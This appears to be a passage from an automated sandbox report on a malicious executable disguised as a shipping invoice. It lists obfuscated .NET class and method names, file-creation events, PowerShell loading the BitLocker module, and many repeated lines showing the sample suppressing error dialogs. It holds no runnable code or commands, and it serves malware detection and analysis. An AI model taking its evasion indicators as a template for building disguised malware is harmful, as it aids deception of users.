          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, JQqsVKjWQOVtcE5Zal.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vbQsacS2qB', 'AiTsLkJocc', 'JK1szmO07q', 'YjuZefJm7A', 'PYrZi3H9r3', 'GV9ZsU5XDG', 'PMfZZxZYD1', 'vnLvEnXYnQgmeLEXxeb'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, k8C9r2iiXQeG8jHeUja.csHigh entropy of concatenated method names: 'ToString', 'dK8qZ6IORP', 'GZlqIf3iQt', 'kxnqDK5WVN', 'RwQqdbnCYP', 'kSDqfFugoJ', 'oHvqjagJdd', 'oEeqpRckAG', 'Jr1aGPsh4m5rGHkncG4', 'BRnPq8slAy2Egfabqps'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, rwp6AFieXooDZJVjHdN.csHigh entropy of concatenated method names: 'CQ6BT0NXSu', 'eGJBlPBRRr', 'eNoBM32wiC', 'zwpBwQhQex', 'wkxBQdneJx', 'Mw9BHvhnaq', 'RlqB6fkFul', 'M5vBGHHZEb', 'EoDBF5HqE5', 'EBUBcNREc0'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, stUV6qiZh6MgUg3g2B9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gDAqCOuXm4', 'q1Qq19jhnw', 'EHQq29PaYX', 'ig4qovnhUw', 'vUvqNvOk0Q', 'R7wqr9Bg8U', 'seVquP7LwK'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, B6nIkZ4UqIEkYQ9uw2.csHigh entropy of concatenated method names: 'lUqUdjD4sa', 'GO4UflBv9C', 'KEtUjfwh79', 'HgRUp6k0Qp', 'UkqUh3bBPX', 'nvnURIMiMH', 'GG5UV4cFR4', 'IQMUW2tyJN', 'j4MUkca0QW', 'f8oUOv3wa9'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, rJVou0L5V1Jte8d0ue.csHigh entropy of concatenated method names: 'OtNBixOn3C', 'CMvBZicg7S', 'RumBIn02rf', 'KsxBdFZkII', 'DGaBfKHsJE', 'JljBpiH2ZQ', 'zVDBhfbqrZ', 'mUoUuZMxDo', 'a5xU4D4W0n', 'ibYUapyVeJ'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, XnVtWb0DxhsaseC06C.csHigh entropy of concatenated method names: 'yfxhDncfKf', 'SCehfsi9EI', 'H4jhps3WCb', 'tJ5hR5aNby', 'xTXhVit86N', 'pkUpNNpfCG', 't86prDPiws', 'U1wpueim8P', 'pRYp4FHpvI', 'GcWpa8EPCL'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, Bx0ofA8jhf3kY44yRE.csHigh entropy of concatenated method names: 'UQayGF7ETY', 'QdZyFirkkh', 'sNqy0Of0RK', 'gBdyYyRZM5', 'uQpyv8kWXY', 'CqRySaALZB', 'Pq2ygS2qO9', 'lb5ymCkLR5', 'DXdyJLyG6Y', 'KUMythTJqB'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, ddhwE6Ai2OALZaf3qR.csHigh entropy of concatenated method names: 'CEiRTVNlow', 'MTMRlEqPWi', 'JwURMoCGdk', 'J1wRwMhONI', 'G2mRQgf3MZ', 'OYPRHuoOhP', 'ADsR6ZG7e4', 'D3QRGyLGkn', 'tKPRFrX7QD', 'lLfRcqaYxy'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, wJlEu0INxDpaHEuvQZ.csHigh entropy of concatenated method names: 'sNFiRAys4Y', 'r7viVGVXp1', 'Jn2ikP5D4K', 'ahViOqVPbd', 'tZ7i7o2anV', 'OWbiXDxhsa', 'V40D3gBHDK2C1IdUV1', 'SmELmbWAj06kDnNEWG', 'jFZiiAutZo', 'CociZdCwC2'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, OsZlVmswaL3gf5RUYS.csHigh entropy of concatenated method names: 'TEkMXkNj9', 'FAgwLQvOO', 'yDhHfRQ8U', 'nbd6Omrq3', 'YotFg2w4p', 'QMZcpXukw', 'GMInvaqeKuEtseYywQ', 'cZKfkePbtCAIoosgch', 'O5nU9oP6X', 'J9AqgubOf'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, ungwLuisBvQabOvsDHB.csHigh entropy of concatenated method names: 'T1AqTFU1S7', 'n9pqlmi2RN', 'zh2qMLM7jO', 'BO36XlsBCOIvrYHG8MR', 'ybeQ5DsWN1qLyCmVhRs', 'dKsPT7sMrhnNRtrkEQ1', 'jeElxvskXpPNW9j6UWG', 'yS2UlVsFSv7FCnit8FV'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, NoxONxz8d7Mp0qaRrT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rspByROvpq', 'S8xB7gUpBn', 'kW7BX0MnsZ', 'gL1BEDTZGF', 'Q7tBUSxETS', 'VLdBBH3XYR', 'SSUBq2B9R6'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, RxiKep2mVkECmQZ9a2.csHigh entropy of concatenated method names: 'ToString', 'AFMXtxgXpj', 'tOEXY0dY8v', 'uvGXKpsfEV', 'GeFXva8VK5', 'GJlXS8upqZ', 'wejXn9jTec', 'T37XgWge35', 'nTwXmJHyCh', 'vCSXATcBkE'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, xfJeluaehfASS0G50k.csHigh entropy of concatenated method names: 'lmtU0pUWHL', 'zEtUYRRtDJ', 'nr6UKIuBo6', 'R8hUvSVA4x', 'WLCUC2MMLA', 'SQSUSTHKQO', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, kPbdSNcZWAPRNqZ7o2.csHigh entropy of concatenated method names: 'IkWpQCKmPw', 'YAyp6KVuIx', 'DO1jK4QlSI', 'BkAjvwKjVr', 'NrUjSnYgh9', 'H7hjnDGie6', 'zegjgpEsRw', 'OWQjm1JcV2', 'Tx6jANgkqa', 'aydjJrvyJ8'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, AUvy7vFn2P5D4KehVq.csHigh entropy of concatenated method names: 'Gl1jwf6bOQ', 'RZ3jHwpfOD', 'FsajGOOqpm', 'DsLjFiwRhk', 'C0Wj7bj8sx', 'nsbjXH2LwF', 'TdgjEAmb9Y', 'VnxjUlqsK3', 'XEGjB5ZsUn', 'TKmjq8Llxk'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, KtpTe5ftgXZhCg2E5w.csHigh entropy of concatenated method names: 'Dispose', 'mDiiaA1k6r', 'LAIsYR7EqV', 'D6m99Lvm84', 'UQ6iLnIkZU', 'sIEizkYQ9u', 'ProcessDialogKey', 'A29sefJelu', 'ahfsiASS0G', 'P0kssUJVou'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, HIttxdr37CBmL9r71a.csHigh entropy of concatenated method names: 'MF5E4yhakH', 'hZ0ELOUEg6', 'HqNUeXf7xZ', 'B7xUinIZRb', 'bKWEta3s6U', 'DtdE5qwMRh', 'rTKE8JLY2w', 'inLECadrSo', 'xsFE1TSdns', 'PKKE2gbCTk'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, EAys4YGB7vGVXp1hhL.csHigh entropy of concatenated method names: 'qXwfC4lbT9', 'gVjf1wt0tB', 'cWgf2mvKdk', 'Edmfofhive', 'vJCfN5dHWk', 'vLNfrZSAYQ', 'EXifum15ou', 'bg0f41kAnP', 'dfgfaIhptF', 'Gt3fLBqtCN'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, BVeR06CMFHJLXbULXQ.csHigh entropy of concatenated method names: 'T7o7JYwvfU', 'r3r7564Zo1', 'CjW7Cf6Q0X', 'ADq71idqgb', 'Y7A7Y0Anyu', 'A4c7K1v2LY', 'k0F7v7c11S', 'heX7SfkOwM', 'Qy37nkJMIs', 'xdv7gHhWkb'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, KmS8hjV3UlaappQopN.csHigh entropy of concatenated method names: 'spEZDZIhxn', 'VKuZdmI2Id', 'PxfZfHvgXq', 'mGyZjhO6sU', 'WWiZplw3IL', 'uq5Zh4qgjE', 'UUfZRSBH66', 'YySZVB1ncT', 'nFdZWmwDVS', 'YQnZkqp9Ek'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, NjfYrlgJga7DmojS1R.csHigh entropy of concatenated method names: 'fuGRdvt8d1', 'g5bRjaIVvo', 'Ql3RhqbPdv', 'uePhLGxNt9', 'e8OhzTcyNd', 'G6GReDKS0L', 'EuTRilD8Gt', 'lBERsYYVUf', 'gNERZoJcAC', 'x7vRICjZQy'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, EwnlRboOeBns8xbBPq.csHigh entropy of concatenated method names: 'gvAEk3Iuhm', 'SafEOrMwiy', 'ToString', 'SLYEdtGZ0n', 'RAdEfHo9OQ', 'YUIEjqOFNG', 'XBvEpOnJxw', 'w6CEhniAWh', 'IQAERGFePL', 'HEeEVka4JB'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, JQqsVKjWQOVtcE5Zal.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vbQsacS2qB', 'AiTsLkJocc', 'JK1szmO07q', 'YjuZefJm7A', 'PYrZi3H9r3', 'GV9ZsU5XDG', 'PMfZZxZYD1', 'vnLvEnXYnQgmeLEXxeb'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, k8C9r2iiXQeG8jHeUja.csHigh entropy of concatenated method names: 'ToString', 'dK8qZ6IORP', 'GZlqIf3iQt', 'kxnqDK5WVN', 'RwQqdbnCYP', 'kSDqfFugoJ', 'oHvqjagJdd', 'oEeqpRckAG', 'Jr1aGPsh4m5rGHkncG4', 'BRnPq8slAy2Egfabqps'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, rwp6AFieXooDZJVjHdN.csHigh entropy of concatenated method names: 'CQ6BT0NXSu', 'eGJBlPBRRr', 'eNoBM32wiC', 'zwpBwQhQex', 'wkxBQdneJx', 'Mw9BHvhnaq', 'RlqB6fkFul', 'M5vBGHHZEb', 'EoDBF5HqE5', 'EBUBcNREc0'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, stUV6qiZh6MgUg3g2B9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gDAqCOuXm4', 'q1Qq19jhnw', 'EHQq29PaYX', 'ig4qovnhUw', 'vUvqNvOk0Q', 'R7wqr9Bg8U', 'seVquP7LwK'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, B6nIkZ4UqIEkYQ9uw2.csHigh entropy of concatenated method names: 'lUqUdjD4sa', 'GO4UflBv9C', 'KEtUjfwh79', 'HgRUp6k0Qp', 'UkqUh3bBPX', 'nvnURIMiMH', 'GG5UV4cFR4', 'IQMUW2tyJN', 'j4MUkca0QW', 'f8oUOv3wa9'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, rJVou0L5V1Jte8d0ue.csHigh entropy of concatenated method names: 'OtNBixOn3C', 'CMvBZicg7S', 'RumBIn02rf', 'KsxBdFZkII', 'DGaBfKHsJE', 'JljBpiH2ZQ', 'zVDBhfbqrZ', 'mUoUuZMxDo', 'a5xU4D4W0n', 'ibYUapyVeJ'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, XnVtWb0DxhsaseC06C.csHigh entropy of concatenated method names: 'yfxhDncfKf', 'SCehfsi9EI', 'H4jhps3WCb', 'tJ5hR5aNby', 'xTXhVit86N', 'pkUpNNpfCG', 't86prDPiws', 'U1wpueim8P', 'pRYp4FHpvI', 'GcWpa8EPCL'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, Bx0ofA8jhf3kY44yRE.csHigh entropy of concatenated method names: 'UQayGF7ETY', 'QdZyFirkkh', 'sNqy0Of0RK', 'gBdyYyRZM5', 'uQpyv8kWXY', 'CqRySaALZB', 'Pq2ygS2qO9', 'lb5ymCkLR5', 'DXdyJLyG6Y', 'KUMythTJqB'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, ddhwE6Ai2OALZaf3qR.csHigh entropy of concatenated method names: 'CEiRTVNlow', 'MTMRlEqPWi', 'JwURMoCGdk', 'J1wRwMhONI', 'G2mRQgf3MZ', 'OYPRHuoOhP', 'ADsR6ZG7e4', 'D3QRGyLGkn', 'tKPRFrX7QD', 'lLfRcqaYxy'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, wJlEu0INxDpaHEuvQZ.csHigh entropy of concatenated method names: 'sNFiRAys4Y', 'r7viVGVXp1', 'Jn2ikP5D4K', 'ahViOqVPbd', 'tZ7i7o2anV', 'OWbiXDxhsa', 'V40D3gBHDK2C1IdUV1', 'SmELmbWAj06kDnNEWG', 'jFZiiAutZo', 'CociZdCwC2'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, OsZlVmswaL3gf5RUYS.csHigh entropy of concatenated method names: 'TEkMXkNj9', 'FAgwLQvOO', 'yDhHfRQ8U', 'nbd6Omrq3', 'YotFg2w4p', 'QMZcpXukw', 'GMInvaqeKuEtseYywQ', 'cZKfkePbtCAIoosgch', 'O5nU9oP6X', 'J9AqgubOf'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, ungwLuisBvQabOvsDHB.csHigh entropy of concatenated method names: 'T1AqTFU1S7', 'n9pqlmi2RN', 'zh2qMLM7jO', 'BO36XlsBCOIvrYHG8MR', 'ybeQ5DsWN1qLyCmVhRs', 'dKsPT7sMrhnNRtrkEQ1', 'jeElxvskXpPNW9j6UWG', 'yS2UlVsFSv7FCnit8FV'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, NoxONxz8d7Mp0qaRrT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rspByROvpq', 'S8xB7gUpBn', 'kW7BX0MnsZ', 'gL1BEDTZGF', 'Q7tBUSxETS', 'VLdBBH3XYR', 'SSUBq2B9R6'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, RxiKep2mVkECmQZ9a2.csHigh entropy of concatenated method names: 'ToString', 'AFMXtxgXpj', 'tOEXY0dY8v', 'uvGXKpsfEV', 'GeFXva8VK5', 'GJlXS8upqZ', 'wejXn9jTec', 'T37XgWge35', 'nTwXmJHyCh', 'vCSXATcBkE'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, xfJeluaehfASS0G50k.csHigh entropy of concatenated method names: 'lmtU0pUWHL', 'zEtUYRRtDJ', 'nr6UKIuBo6', 'R8hUvSVA4x', 'WLCUC2MMLA', 'SQSUSTHKQO', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, kPbdSNcZWAPRNqZ7o2.csHigh entropy of concatenated method names: 'IkWpQCKmPw', 'YAyp6KVuIx', 'DO1jK4QlSI', 'BkAjvwKjVr', 'NrUjSnYgh9', 'H7hjnDGie6', 'zegjgpEsRw', 'OWQjm1JcV2', 'Tx6jANgkqa', 'aydjJrvyJ8'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, AUvy7vFn2P5D4KehVq.csHigh entropy of concatenated method names: 'Gl1jwf6bOQ', 'RZ3jHwpfOD', 'FsajGOOqpm', 'DsLjFiwRhk', 'C0Wj7bj8sx', 'nsbjXH2LwF', 'TdgjEAmb9Y', 'VnxjUlqsK3', 'XEGjB5ZsUn', 'TKmjq8Llxk'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, KtpTe5ftgXZhCg2E5w.csHigh entropy of concatenated method names: 'Dispose', 'mDiiaA1k6r', 'LAIsYR7EqV', 'D6m99Lvm84', 'UQ6iLnIkZU', 'sIEizkYQ9u', 'ProcessDialogKey', 'A29sefJelu', 'ahfsiASS0G', 'P0kssUJVou'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, HIttxdr37CBmL9r71a.csHigh entropy of concatenated method names: 'MF5E4yhakH', 'hZ0ELOUEg6', 'HqNUeXf7xZ', 'B7xUinIZRb', 'bKWEta3s6U', 'DtdE5qwMRh', 'rTKE8JLY2w', 'inLECadrSo', 'xsFE1TSdns', 'PKKE2gbCTk'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, EAys4YGB7vGVXp1hhL.csHigh entropy of concatenated method names: 'qXwfC4lbT9', 'gVjf1wt0tB', 'cWgf2mvKdk', 'Edmfofhive', 'vJCfN5dHWk', 'vLNfrZSAYQ', 'EXifum15ou', 'bg0f41kAnP', 'dfgfaIhptF', 'Gt3fLBqtCN'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, BVeR06CMFHJLXbULXQ.csHigh entropy of concatenated method names: 'T7o7JYwvfU', 'r3r7564Zo1', 'CjW7Cf6Q0X', 'ADq71idqgb', 'Y7A7Y0Anyu', 'A4c7K1v2LY', 'k0F7v7c11S', 'heX7SfkOwM', 'Qy37nkJMIs', 'xdv7gHhWkb'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, KmS8hjV3UlaappQopN.csHigh entropy of concatenated method names: 'spEZDZIhxn', 'VKuZdmI2Id', 'PxfZfHvgXq', 'mGyZjhO6sU', 'WWiZplw3IL', 'uq5Zh4qgjE', 'UUfZRSBH66', 'YySZVB1ncT', 'nFdZWmwDVS', 'YQnZkqp9Ek'
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeFile created: \invoice - mv cnc bangkok - st24pj-278.exe
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeFile created: \invoice - mv cnc bangkok - st24pj-278.exe
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeFile created: \invoice - mv cnc bangkok - st24pj-278.exeJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeFile created: \invoice - mv cnc bangkok - st24pj-278.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A27DD0 StartServiceCtrlDispatcherW,GetLastError,7_2_00A27DD0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
